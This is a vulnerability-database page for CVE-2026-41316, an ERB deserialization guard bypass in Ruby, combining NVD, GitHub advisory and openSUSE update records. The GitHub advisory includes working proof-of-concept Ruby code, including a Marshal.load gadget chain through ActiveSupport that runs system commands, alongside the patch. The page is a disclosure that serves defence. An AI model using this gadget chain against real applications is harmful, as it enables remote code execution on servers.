Vulnerability-Lookup

CVE-2026-41316 (GCVE-0-2026-41316)

Vulnerability from cvelistv5 – Published: 2026-04-24 02:35 – Updated: 2026-04-25 01:45

Title

ERB has an @_init deserialization guard bypass via def_module / def_method / def_class

Summary

ERB is a templating system for Ruby. Ruby 2.7.0 (before ERB 2.2.0 was published on rubygems.org) introduced an `@_init` instance variable guard in `ERB#result` and `ERB#run` to prevent code execution when an ERB object is reconstructed via `Marshal.load` (deserialization). However, three other public methods that also evaluate `@src` via `eval()` were not given the same guard: `ERB#def_method`, `ERB#def_module`, and `ERB#def_class`. An attacker who can trigger `Marshal.load` on untrusted data in a Ruby application that has `erb` loaded can use `ERB#def_module` (zero-arg, default parameters) as a code execution sink, bypassing the `@_init` protection entirely. ERB 4.0.3.1, 4.0.4.1, 6.0.1.1, and 6.0.4 patch the issue.

Severity ?

8.1 (High)


                        
                          CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

CWE

CWE-693 - Protection Mechanism Failure

Assigner

GitHub_M

References

URL

	Vendor	Product	Version
	ruby	erb	Affected: < 4.0.3.1 Affected: = 4.0.4 Affected: >= 5.0.0, < 6.0.1.1 Affected: >= 6.0.2, < 6.0.4

FKIE_CVE-2026-41316

Vulnerability from fkie_nvd - Published: 2026-04-24 03:16 - Updated: 2026-04-24 14:50

Severity ?

8.1 (High) - CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/ruby/erb/security/advisories/GHSA-q339-8rmv-2mhv

Impacted products

	Vendor	Product	Version

JSON

To clipboard

{
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "ERB is a templating system for Ruby. Ruby 2.7.0 (before ERB 2.2.0 was published on rubygems.org) introduced an `@_init` instance variable guard in `ERB#result` and `ERB#run` to prevent code execution when an ERB object is reconstructed via `Marshal.load` (deserialization). However, three other public methods that also evaluate `@src` via `eval()` were not given the same guard: `ERB#def_method`, `ERB#def_module`, and `ERB#def_class`. An attacker who can trigger `Marshal.load` on untrusted data in a Ruby application that has `erb` loaded can use `ERB#def_module` (zero-arg, default parameters) as a code execution sink, bypassing the `@_init` protection entirely. ERB 4.0.3.1, 4.0.4.1, 6.0.1.1, and 6.0.4 patch the issue."
    }
  ],
  "id": "CVE-2026-41316",
  "lastModified": "2026-04-24T14:50:56.203",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "HIGH",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 8.1,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 2.2,
        "impactScore": 5.9,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-04-24T03:16:11.897",
  "references": [
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/ruby/erb/security/advisories/GHSA-q339-8rmv-2mhv"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Awaiting Analysis",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-693"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Primary"
    }
  ]
}

GHSA-Q339-8RMV-2MHV

Vulnerability from github – Published: 2026-04-24 15:36 – Updated: 2026-04-24 15:36

Summary

ERB has an @_init deserialization guard bypass via def_module / def_method / def_class

Details

Summary

Ruby 2.7.0 (before ERB 2.2.0 was published on rubygems.org) introduced an @_init instance variable guard in ERB#result and ERB#run to prevent code execution when an ERB object is reconstructed via Marshal.load (deserialization). However, three other public methods that also evaluate @src via eval() were not given the same guard:

ERB#def_method
ERB#def_module
ERB#def_class

An attacker who can trigger Marshal.load on untrusted data in a Ruby application that has erb loaded can use ERB#def_module (zero-arg, default parameters) as a code execution sink, bypassing the @_init protection entirely.

## The @_init Guard In `ERB#initialize`, the guard is set:

# erb.rb line 838
@_init = self.class.singleton_class

In `ERB#result` and `ERB#run`, the guard is checked before `eval(@src)`:

# erb.rb line 1008-1012
def result(b=new_toplevel)
  unless @_init.equal?(self.class.singleton_class)
    raise ArgumentError, "not initialized"
  end
  eval(@src, b, (@filename || '(erb)'), @lineno)
end

When an ERB object is reconstructed via `Marshal.load`, `@_init` is either `nil` (not set during marshal reconstruction) or an attacker-controlled value. Since `ERB.singleton_class` cannot be marshaled, the attacker cannot set `@_init` to the correct value, and `result`/`run` correctly refuse to execute. ## The Bypass `ERB#def_method`, `ERB#def_module`, and `ERB#def_class` all reach `eval(@src)` without checking `@_init`:

# erb.rb line 1088-1093
def def_method(mod, methodname, fname='(ERB)')
  src = self.src.sub(/^(?!#|$)/) {"def #{methodname}\n"} << "\nend\n"
  mod.module_eval do
    eval(src, binding, fname, -1)      # <-- no @_init check
  end
end

# erb.rb line 1113-1117
def def_module(methodname='erb')       # <-- zero-arg call possible
  mod = Module.new
  def_method(mod, methodname, @filename || '(ERB)')
  mod
end

# erb.rb line 1170-1174
def def_class(superklass=Object, methodname='result')  # <-- zero-arg call possible
  cls = Class.new(superklass)
  def_method(cls, methodname, @filename || '(ERB)')
  cls
end

`def_module` and `def_class` accept zero arguments (all parameters have defaults), making them callable through deserialization gadget chains that can only invoke zero-arg methods. ### Method wrapper breakout `def_method` wraps `@src` in a method definition: `"def erb\n" + @src + "\nend\n"`. Code inside a method body only executes when the method is called, not when it's defined. However, by setting `@src` to begin with `end\n`, the attacker closes the method definition early. Code after the first `end` executes immediately at `module_eval` time:

# Attacker sets @src = "end\nsystem('id')\ndef x"
# After def_method transformation, module_eval receives:
#
#   def erb
#   end
#   system('id')    <- executes at eval time
#   def x
#   end

--- ## Proof of Concept ### Minimal (ERB only)

require 'erb'

erb = ERB.allocate
erb.instance_variable_set(:@src, "end\nsystem('id')\ndef x")
erb.instance_variable_set(:@lineno, 0)

# ERB#result correctly blocks this:
begin
  erb.result
rescue ArgumentError => e
  puts "result: #{e.message} (blocked by @_init -- correct)"
end

# ERB#def_module does NOT block this -- executes system('id'):
erb.def_module
# Output: uid=0(root) gid=0(root) groups=0(root)

### Marshal deserialization (ERB + ActiveSupport) When combined with `ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy` as a method dispatch gadget, this achieves RCE via `Marshal.load`:

require 'active_support'
require 'active_support/deprecation'
require 'active_support/deprecation/proxy_wrappers'
require 'erb'

# --- Build payload (replace proxy class for marshaling) ---
real_class = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy
ActiveSupport::Deprecation.send(:remove_const, :DeprecatedInstanceVariableProxy)
class ActiveSupport::Deprecation
  class DeprecatedInstanceVariableProxy
    def initialize(h)
      h.each { |k, v| instance_variable_set(k, v) }
    end
  end
end

erb = ERB.allocate
erb.instance_variable_set(:@src, "end\nsystem('id')\ndef x")
erb.instance_variable_set(:@lineno, 0)
erb.instance_variable_set(:@filename, nil)

proxy = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new({
  :@instance => erb,
  :@method => :def_module,
  :@var => "@x",
  :@deprecator => Kernel
})

marshaled = Marshal.dump({proxy => 0})

# --- Restore real class and trigger ---
ActiveSupport::Deprecation.send(:remove_const, :DeprecatedInstanceVariableProxy)
ActiveSupport::Deprecation.const_set(:DeprecatedInstanceVariableProxy, real_class)

# This triggers RCE:
Marshal.load(marshaled)
# Output: uid=0(root) gid=0(root) groups=0(root)

**Chain:** 1. `Marshal.load` reconstructs a Hash with a `DeprecatedInstanceVariableProxy` as key 2. Hash key insertion calls `.hash` on the proxy 3. `.hash` is undefined -> `method_missing(:hash)` -> dispatches to `ERB#def_module` 4. `def_module` -> `def_method` -> `module_eval(eval(src))` -> breakout -> `system('id')` **Verified on:** Ruby 3.3.8 / RubyGems 3.6.7 / ActiveSupport 7.2.3 / ERB 6.0.1

Impact

Scope

Any Ruby application that calls Marshal.load on untrusted data AND has both erb and activesupport loaded is vulnerable to arbitrary code execution. This includes:

Ruby on Rails applications that import untrusted serialized data -- any Rails app (every Rails app loads both ActiveSupport and ERB) using Marshal.load for caching, data import, or IPC
Ruby tools that import untrusted serialized data -- any tool using Marshal.load for caching, data import, or IPC
Legacy Rails apps (pre-7.0) that still use Marshal for cookie session serialization

Severity justification

The @_init guard was the recognized last line of defense against ERB being used as a deserialization gadget. Prior gadget chain research -- including Luke Jahnke's November 2024 Ruby 3.4 chain (nastystereo.com) and vakzz's 2021 Universal Deserialization Gadget -- pursued entirely different approaches (Gem::SpecFetcher, UncaughtThrowError, TarReader+WriteAdapter) without exploring the ERB def_method/def_module path. The def_module bypass is simpler and more direct than all previous chains, and was not addressed by the subsequent patches to Ruby 3.4 or RubyGems 3.6.

This bypass renders the @_init mitigation ineffective across all ERB versions from 2.2.0 through 6.0.3 (latest as of April 2026). Combined with the DeprecatedInstanceVariableProxy gadget (present in all ActiveSupport versions through 7.2.3), this constitutes a universal RCE gadget chain for Ruby 3.2+ applications using Rails.

### Gadget chain history Six generations of Ruby Marshal gadget chains have been discovered (2018-2026). Each bypassed the previous round of mitigations: | Year | Chain | Mitigated in | |------|-------|-------------| | 2018 | Gem::Requirement (Luke Jahnke) | RubyGems 3.0 | | 2021 | UDG -- TarReader+WriteAdapter (vakzz) | RubyGems 3.1 | | 2022 | Gem::Specification._load (vakzz) | RubyGems 3.6 | | 2024 | UncaughtThrowError (Luke Jahnke) | Ruby 3.4 patches | | 2024 | Gem::Source::Git#rev_parse | RubyGems 3.6 | | **2026** | **ERB#def_module @_init bypass** | **ERB 6.0.4** |

Patches

The problem has been patched at the following ERB versions. Please upgrade your erb.gem to any one of them.

ERB 4.0.3.1, 4.0.4.1, 6.0.1.1, and 6.0.4

Add the `@_init` check to `def_method`. Since `def_module` and `def_class` both delegate to `def_method`, this single change covers all three bypass paths:

def def_method(mod, methodname, fname='(ERB)')
  unless @_init.equal?(self.class.singleton_class)
    raise ArgumentError, "not initialized"
  end
  src = self.src.sub(/^(?!#|$)/) {"def #{methodname}\n"} << "\nend\n"
  mod.module_eval do
    eval(src, binding, fname, -1)
  end
end

Severity ?

8.1 (High)


                  
                    CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "RubyGems",
        "name": "erb"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "4.0.3.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "RubyGems",
        "name": "erb"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "4.0.4"
            },
            {
              "fixed": "4.0.4.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ],
      "versions": [
        "4.0.4"
      ]
    },
    {
      "package": {
        "ecosystem": "RubyGems",
        "name": "erb"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "5.0.0"
            },
            {
              "fixed": "6.0.1.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "RubyGems",
        "name": "erb"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "6.0.2"
            },
            {
              "fixed": "6.0.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-41316"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-693"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-24T15:36:05Z",
    "nvd_published_at": "2026-04-24T03:16:11Z",
    "severity": "HIGH"
  },
  "details": "## Summary\n\nRuby 2.7.0 (before ERB 2.2.0 was published on rubygems.org) introduced an `@_init` instance variable guard in `ERB#result` and `ERB#run` to prevent code execution when an ERB object is reconstructed via `Marshal.load` (deserialization). However, three other public methods that also evaluate `@src` via `eval()` were not given the same guard:\n\n- `ERB#def_method`\n- `ERB#def_module`\n- `ERB#def_class`\n\nAn attacker who can trigger `Marshal.load` on untrusted data in a Ruby application that has `erb` loaded can use `ERB#def_module` (zero-arg, default parameters) as a code execution sink, bypassing the `@_init` protection entirely.\n\n\u003cdetails\u003e\n\n## The @_init Guard\n\nIn `ERB#initialize`, the guard is set:\n\n```ruby\n# erb.rb line 838\n@_init = self.class.singleton_class\n```\n\nIn `ERB#result` and `ERB#run`, the guard is checked before `eval(@src)`:\n\n```ruby\n# erb.rb line 1008-1012\ndef result(b=new_toplevel)\n  unless @_init.equal?(self.class.singleton_class)\n    raise ArgumentError, \"not initialized\"\n  end\n  eval(@src, b, (@filename || \u0027(erb)\u0027), @lineno)\nend\n```\n\nWhen an ERB object is reconstructed via `Marshal.load`, `@_init` is either `nil` (not set during marshal reconstruction) or an attacker-controlled value. Since `ERB.singleton_class` cannot be marshaled, the attacker cannot set `@_init` to the correct value, and `result`/`run` correctly refuse to execute.\n\n## The Bypass\n\n`ERB#def_method`, `ERB#def_module`, and `ERB#def_class` all reach `eval(@src)` without checking `@_init`:\n\n```ruby\n# erb.rb line 1088-1093\ndef def_method(mod, methodname, fname=\u0027(ERB)\u0027)\n  src = self.src.sub(/^(?!#|$)/) {\"def #{methodname}\\n\"} \u003c\u003c \"\\nend\\n\"\n  mod.module_eval do\n    eval(src, binding, fname, -1)      # \u003c-- no @_init check\n  end\nend\n\n# erb.rb line 1113-1117\ndef def_module(methodname=\u0027erb\u0027)       # \u003c-- zero-arg call possible\n  mod = Module.new\n  def_method(mod, methodname, @filename || \u0027(ERB)\u0027)\n  mod\nend\n\n# erb.rb line 1170-1174\ndef def_class(superklass=Object, methodname=\u0027result\u0027)  # \u003c-- zero-arg call possible\n  cls = Class.new(superklass)\n  def_method(cls, methodname, @filename || \u0027(ERB)\u0027)\n  cls\nend\n```\n\n`def_module` and `def_class` accept zero arguments (all parameters have defaults), making them callable through deserialization gadget chains that can only invoke zero-arg methods.\n\n### Method wrapper breakout\n\n`def_method` wraps `@src` in a method definition: `\"def erb\\n\" + @src + \"\\nend\\n\"`. Code inside a method body only executes when the method is called, not when it\u0027s defined. However, by setting `@src` to begin with `end\\n`, the attacker closes the method definition early. Code after the first `end` executes immediately at `module_eval` time:\n\n```ruby\n# Attacker sets @src = \"end\\nsystem(\u0027id\u0027)\\ndef x\"\n# After def_method transformation, module_eval receives:\n#\n#   def erb\n#   end\n#   system(\u0027id\u0027)    \u003c- executes at eval time\n#   def x\n#   end\n```\n\n---\n\n## Proof of Concept\n\n### Minimal (ERB only)\n\n```ruby\nrequire \u0027erb\u0027\n\nerb = ERB.allocate\nerb.instance_variable_set(:@src, \"end\\nsystem(\u0027id\u0027)\\ndef x\")\nerb.instance_variable_set(:@lineno, 0)\n\n# ERB#result correctly blocks this:\nbegin\n  erb.result\nrescue ArgumentError =\u003e e\n  puts \"result: #{e.message} (blocked by @_init -- correct)\"\nend\n\n# ERB#def_module does NOT block this -- executes system(\u0027id\u0027):\nerb.def_module\n# Output: uid=0(root) gid=0(root) groups=0(root)\n```\n\n### Marshal deserialization (ERB + ActiveSupport)\n\nWhen combined with `ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy` as a method dispatch gadget, this achieves RCE via `Marshal.load`:\n\n```ruby\nrequire \u0027active_support\u0027\nrequire \u0027active_support/deprecation\u0027\nrequire \u0027active_support/deprecation/proxy_wrappers\u0027\nrequire \u0027erb\u0027\n\n# --- Build payload (replace proxy class for marshaling) ---\nreal_class = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy\nActiveSupport::Deprecation.send(:remove_const, :DeprecatedInstanceVariableProxy)\nclass ActiveSupport::Deprecation\n  class DeprecatedInstanceVariableProxy\n    def initialize(h)\n      h.each { |k, v| instance_variable_set(k, v) }\n    end\n  end\nend\n\nerb = ERB.allocate\nerb.instance_variable_set(:@src, \"end\\nsystem(\u0027id\u0027)\\ndef x\")\nerb.instance_variable_set(:@lineno, 0)\nerb.instance_variable_set(:@filename, nil)\n\nproxy = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new({\n  :@instance =\u003e erb,\n  :@method =\u003e :def_module,\n  :@var =\u003e \"@x\",\n  :@deprecator =\u003e Kernel\n})\n\nmarshaled = Marshal.dump({proxy =\u003e 0})\n\n# --- Restore real class and trigger ---\nActiveSupport::Deprecation.send(:remove_const, :DeprecatedInstanceVariableProxy)\nActiveSupport::Deprecation.const_set(:DeprecatedInstanceVariableProxy, real_class)\n\n# This triggers RCE:\nMarshal.load(marshaled)\n# Output: uid=0(root) gid=0(root) groups=0(root)\n```\n\n**Chain:**\n1. `Marshal.load` reconstructs a Hash with a `DeprecatedInstanceVariableProxy` as key\n2. Hash key insertion calls `.hash` on the proxy\n3. `.hash` is undefined -\u003e `method_missing(:hash)` -\u003e dispatches to `ERB#def_module`\n4. `def_module` -\u003e `def_method` -\u003e `module_eval(eval(src))` -\u003e breakout -\u003e `system(\u0027id\u0027)`\n\n**Verified on:** Ruby 3.3.8 / RubyGems 3.6.7 / ActiveSupport 7.2.3 / ERB 6.0.1\n\n\n\u003c/details\u003e\n\n## Impact\n### Scope\n\nAny Ruby application that calls `Marshal.load` on untrusted data AND has both `erb` and `activesupport` loaded is vulnerable to arbitrary code execution. This includes:\n\n- **Ruby on Rails applications that import untrusted serialized data** -- any Rails app (every Rails app loads both ActiveSupport and ERB) using Marshal.load for caching, data import, or IPC\n- **Ruby tools that import untrusted serialized data** -- any tool using `Marshal.load` for caching, data import, or IPC\n- **Legacy Rails apps** (pre-7.0) that still use Marshal for cookie session serialization\n\n### Severity justification\n\nThe `@_init` guard was the recognized last line of defense against ERB being used as a deserialization gadget. Prior gadget chain research -- including Luke Jahnke\u0027s November 2024 Ruby 3.4 chain (nastystereo.com) and vakzz\u0027s 2021 Universal Deserialization Gadget -- pursued entirely different approaches (Gem::SpecFetcher, UncaughtThrowError, TarReader+WriteAdapter) without exploring the ERB def_method/def_module path. The `def_module` bypass is simpler and more direct than all previous chains, and was not addressed by the subsequent patches to Ruby 3.4 or RubyGems 3.6.\n\nThis bypass renders the @_init mitigation ineffective across all ERB versions from 2.2.0 through 6.0.3 (latest as of April 2026). Combined with the DeprecatedInstanceVariableProxy gadget (present in all ActiveSupport versions through 7.2.3), this constitutes a universal RCE gadget chain for Ruby 3.2+ applications using Rails.\n\n\u003cdetails\u003e\n\n### Gadget chain history\n\nSix generations of Ruby Marshal gadget chains have been discovered (2018-2026). Each bypassed the previous round of mitigations:\n\n| Year | Chain | Mitigated in |\n|------|-------|-------------|\n| 2018 | Gem::Requirement (Luke Jahnke) | RubyGems 3.0 |\n| 2021 | UDG -- TarReader+WriteAdapter (vakzz) | RubyGems 3.1 |\n| 2022 | Gem::Specification._load (vakzz) | RubyGems 3.6 |\n| 2024 | UncaughtThrowError (Luke Jahnke) | Ruby 3.4 patches |\n| 2024 | Gem::Source::Git#rev_parse | RubyGems 3.6 |\n| **2026** | **ERB#def_module @_init bypass** | **ERB 6.0.4** |\n\n\u003c/details\u003e\n\n## Patches\n\nThe problem has been patched at the following ERB versions. Please upgrade your erb.gem to any one of them.\n\n* ERB 4.0.3.1, 4.0.4.1, 6.0.1.1, and 6.0.4\n\n\u003cdetails\u003e\n\nAdd the `@_init` check to `def_method`. Since `def_module` and `def_class` both delegate to `def_method`, this single change covers all three bypass paths:\n\n```ruby\ndef def_method(mod, methodname, fname=\u0027(ERB)\u0027)\n  unless @_init.equal?(self.class.singleton_class)\n    raise ArgumentError, \"not initialized\"\n  end\n  src = self.src.sub(/^(?!#|$)/) {\"def #{methodname}\\n\"} \u003c\u003c \"\\nend\\n\"\n  mod.module_eval do\n    eval(src, binding, fname, -1)\n  end\nend\n```\n\n\u003c/details\u003e\n\n-----",
  "id": "GHSA-q339-8rmv-2mhv",
  "modified": "2026-04-24T15:36:05Z",
  "published": "2026-04-24T15:36:05Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/ruby/erb/security/advisories/GHSA-q339-8rmv-2mhv"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41316"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/ruby/erb"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "ERB has an @_init deserialization guard bypass via def_module / def_method / def_class"
}

OPENSUSE-SU-2026:10609-1

Vulnerability from csaf_opensuse - Published: 2026-04-23 00:00 - Updated: 2026-04-23 00:00

Summary

libruby4_0-4_0-4.0.3-1.1 on GA media

Severity

Moderate

Notes

Title of the patch: libruby4_0-4_0-4.0.3-1.1 on GA media

Description of the patch: These are all security issues fixed in the libruby4_0-4_0-4.0.3-1.1 package on the GA media of openSUSE Tumbleweed.

Patchnames: openSUSE-Tumbleweed-2026-10609

CVE-2026-41316

Vendor Fix To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".

References

URL

Category

	https://www.suse.com/support/security/rating/	external
	https://ftp.suse.com/pub/projects/security/csaf/o…	self
	https://www.suse.com/security/cve/CVE-2026-41316/	self
	https://www.suse.com/security/cve/CVE-2026-41316	external
	https://bugzilla.suse.com/1262441	external

JSON

To clipboard

{
  "document": {
    "aggregate_severity": {
      "namespace": "https://www.suse.com/support/security/rating/",
      "text": "moderate"
    },
    "category": "csaf_security_advisory",
    "csaf_version": "2.0",
    "distribution": {
      "text": "Copyright 2024 SUSE LLC. All rights reserved.",
      "tlp": {
        "label": "WHITE",
        "url": "https://www.first.org/tlp/"
      }
    },
    "lang": "en",
    "notes": [
      {
        "category": "summary",
        "text": "libruby4_0-4_0-4.0.3-1.1 on GA media",
        "title": "Title of the patch"
      },
      {
        "category": "description",
        "text": "These are all security issues fixed in the libruby4_0-4_0-4.0.3-1.1 package on the GA media of openSUSE Tumbleweed.",
        "title": "Description of the patch"
      },
      {
        "category": "details",
        "text": "openSUSE-Tumbleweed-2026-10609",
        "title": "Patchnames"
      },
      {
        "category": "legal_disclaimer",
        "text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
        "title": "Terms of use"
      }
    ],
    "publisher": {
      "category": "vendor",
      "contact_details": "https://www.suse.com/support/security/contact/",
      "name": "SUSE Product Security Team",
      "namespace": "https://www.suse.com/"
    },
    "references": [
      {
        "category": "external",
        "summary": "SUSE ratings",
        "url": "https://www.suse.com/support/security/rating/"
      },
      {
        "category": "self",
        "summary": "URL of this CSAF notice",
        "url": "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2026_10609-1.json"
      },
      {
        "category": "self",
        "summary": "SUSE CVE CVE-2026-41316 page",
        "url": "https://www.suse.com/security/cve/CVE-2026-41316/"
      }
    ],
    "title": "libruby4_0-4_0-4.0.3-1.1 on GA media",
    "tracking": {
      "current_release_date": "2026-04-23T00:00:00Z",
      "generator": {
        "date": "2026-04-23T00:00:00Z",
        "engine": {
          "name": "cve-database.git:bin/generate-csaf.pl",
          "version": "1"
        }
      },
      "id": "openSUSE-SU-2026:10609-1",
      "initial_release_date": "2026-04-23T00:00:00Z",
      "revision_history": [
        {
          "date": "2026-04-23T00:00:00Z",
          "number": "1",
          "summary": "Current version"
        }
      ],
      "status": "final",
      "version": "1"
    }
  },
  "product_tree": {
    "branches": [
      {
        "branches": [
          {
            "branches": [
              {
                "category": "product_version",
                "name": "libruby4_0-4_0-4.0.3-1.1.aarch64",
                "product": {
                  "name": "libruby4_0-4_0-4.0.3-1.1.aarch64",
                  "product_id": "libruby4_0-4_0-4.0.3-1.1.aarch64"
                }
              },
              {
                "category": "product_version",
                "name": "ruby4.0-4.0.3-1.1.aarch64",
                "product": {
                  "name": "ruby4.0-4.0.3-1.1.aarch64",
                  "product_id": "ruby4.0-4.0.3-1.1.aarch64"
                }
              },
              {
                "category": "product_version",
                "name": "ruby4.0-devel-4.0.3-1.1.aarch64",
                "product": {
                  "name": "ruby4.0-devel-4.0.3-1.1.aarch64",
                  "product_id": "ruby4.0-devel-4.0.3-1.1.aarch64"
                }
              },
              {
                "category": "product_version",
                "name": "ruby4.0-devel-extra-4.0.3-1.1.aarch64",
                "product": {
                  "name": "ruby4.0-devel-extra-4.0.3-1.1.aarch64",
                  "product_id": "ruby4.0-devel-extra-4.0.3-1.1.aarch64"
                }
              },
              {
                "category": "product_version",
                "name": "ruby4.0-doc-4.0.3-1.1.aarch64",
                "product": {
                  "name": "ruby4.0-doc-4.0.3-1.1.aarch64",
                  "product_id": "ruby4.0-doc-4.0.3-1.1.aarch64"
                }
              },
              {
                "category": "product_version",
                "name": "ruby4.0-doc-ri-4.0.3-1.1.aarch64",
                "product": {
                  "name": "ruby4.0-doc-ri-4.0.3-1.1.aarch64",
                  "product_id": "ruby4.0-doc-ri-4.0.3-1.1.aarch64"
                }
              }
            ],
            "category": "architecture",
            "name": "aarch64"
          },
          {
            "branches": [
              {
                "category": "product_version",
                "name": "libruby4_0-4_0-4.0.3-1.1.ppc64le",
                "product": {
                  "name": "libruby4_0-4_0-4.0.3-1.1.ppc64le",
                  "product_id": "libruby4_0-4_0-4.0.3-1.1.ppc64le"
                }
              },
              {
                "category": "product_version",
                "name": "ruby4.0-4.0.3-1.1.ppc64le",
                "product": {
                  "name": "ruby4.0-4.0.3-1.1.ppc64le",
                  "product_id": "ruby4.0-4.0.3-1.1.ppc64le"
                }
              },
              {
                "category": "product_version",
                "name": "ruby4.0-devel-4.0.3-1.1.ppc64le",
                "product": {
                  "name": "ruby4.0-devel-4.0.3-1.1.ppc64le",
                  "product_id": "ruby4.0-devel-4.0.3-1.1.ppc64le"
                }
              },
              {
                "category": "product_version",
                "name": "ruby4.0-devel-extra-4.0.3-1.1.ppc64le",
                "product": {
                  "name": "ruby4.0-devel-extra-4.0.3-1.1.ppc64le",
                  "product_id": "ruby4.0-devel-extra-4.0.3-1.1.ppc64le"
                }
              },
              {
                "category": "product_version",
                "name": "ruby4.0-doc-4.0.3-1.1.ppc64le",
                "product": {
                  "name": "ruby4.0-doc-4.0.3-1.1.ppc64le",
                  "product_id": "ruby4.0-doc-4.0.3-1.1.ppc64le"
                }
              },
              {
                "category": "product_version",
                "name": "ruby4.0-doc-ri-4.0.3-1.1.ppc64le",
                "product": {
                  "name": "ruby4.0-doc-ri-4.0.3-1.1.ppc64le",
                  "product_id": "ruby4.0-doc-ri-4.0.3-1.1.ppc64le"
                }
              }
            ],
            "category": "architecture",
            "name": "ppc64le"
          },
          {
            "branches": [
              {
                "category": "product_version",
                "name": "libruby4_0-4_0-4.0.3-1.1.s390x",
                "product": {
                  "name": "libruby4_0-4_0-4.0.3-1.1.s390x",
                  "product_id": "libruby4_0-4_0-4.0.3-1.1.s390x"
                }
              },
              {
                "category": "product_version",
                "name": "ruby4.0-4.0.3-1.1.s390x",
                "product": {
                  "name": "ruby4.0-4.0.3-1.1.s390x",
                  "product_id": "ruby4.0-4.0.3-1.1.s390x"
                }
              },
              {
                "category": "product_version",
                "name": "ruby4.0-devel-4.0.3-1.1.s390x",
                "product": {
                  "name": "ruby4.0-devel-4.0.3-1.1.s390x",
                  "product_id": "ruby4.0-devel-4.0.3-1.1.s390x"
                }
              },
              {
                "category": "product_version",
                "name": "ruby4.0-devel-extra-4.0.3-1.1.s390x",
                "product": {
                  "name": "ruby4.0-devel-extra-4.0.3-1.1.s390x",
                  "product_id": "ruby4.0-devel-extra-4.0.3-1.1.s390x"
                }
              },
              {
                "category": "product_version",
                "name": "ruby4.0-doc-4.0.3-1.1.s390x",
                "product": {
                  "name": "ruby4.0-doc-4.0.3-1.1.s390x",
                  "product_id": "ruby4.0-doc-4.0.3-1.1.s390x"
                }
              },
              {
                "category": "product_version",
                "name": "ruby4.0-doc-ri-4.0.3-1.1.s390x",
                "product": {
                  "name": "ruby4.0-doc-ri-4.0.3-1.1.s390x",
                  "product_id": "ruby4.0-doc-ri-4.0.3-1.1.s390x"
                }
              }
            ],
            "category": "architecture",
            "name": "s390x"
          },
          {
            "branches": [
              {
                "category": "product_version",
                "name": "libruby4_0-4_0-4.0.3-1.1.x86_64",
                "product": {
                  "name": "libruby4_0-4_0-4.0.3-1.1.x86_64",
                  "product_id": "libruby4_0-4_0-4.0.3-1.1.x86_64"
                }
              },
              {
                "category": "product_version",
                "name": "ruby4.0-4.0.3-1.1.x86_64",
                "product": {
                  "name": "ruby4.0-4.0.3-1.1.x86_64",
                  "product_id": "ruby4.0-4.0.3-1.1.x86_64"
                }
              },
              {
                "category": "product_version",
                "name": "ruby4.0-devel-4.0.3-1.1.x86_64",
                "product": {
                  "name": "ruby4.0-devel-4.0.3-1.1.x86_64",
                  "product_id": "ruby4.0-devel-4.0.3-1.1.x86_64"
                }
              },
              {
                "category": "product_version",
                "name": "ruby4.0-devel-extra-4.0.3-1.1.x86_64",
                "product": {
                  "name": "ruby4.0-devel-extra-4.0.3-1.1.x86_64",
                  "product_id": "ruby4.0-devel-extra-4.0.3-1.1.x86_64"
                }
              },
              {
                "category": "product_version",
                "name": "ruby4.0-doc-4.0.3-1.1.x86_64",
                "product": {
                  "name": "ruby4.0-doc-4.0.3-1.1.x86_64",
                  "product_id": "ruby4.0-doc-4.0.3-1.1.x86_64"
                }
              },
              {
                "category": "product_version",
                "name": "ruby4.0-doc-ri-4.0.3-1.1.x86_64",
                "product": {
                  "name": "ruby4.0-doc-ri-4.0.3-1.1.x86_64",
                  "product_id": "ruby4.0-doc-ri-4.0.3-1.1.x86_64"
                }
              }
            ],
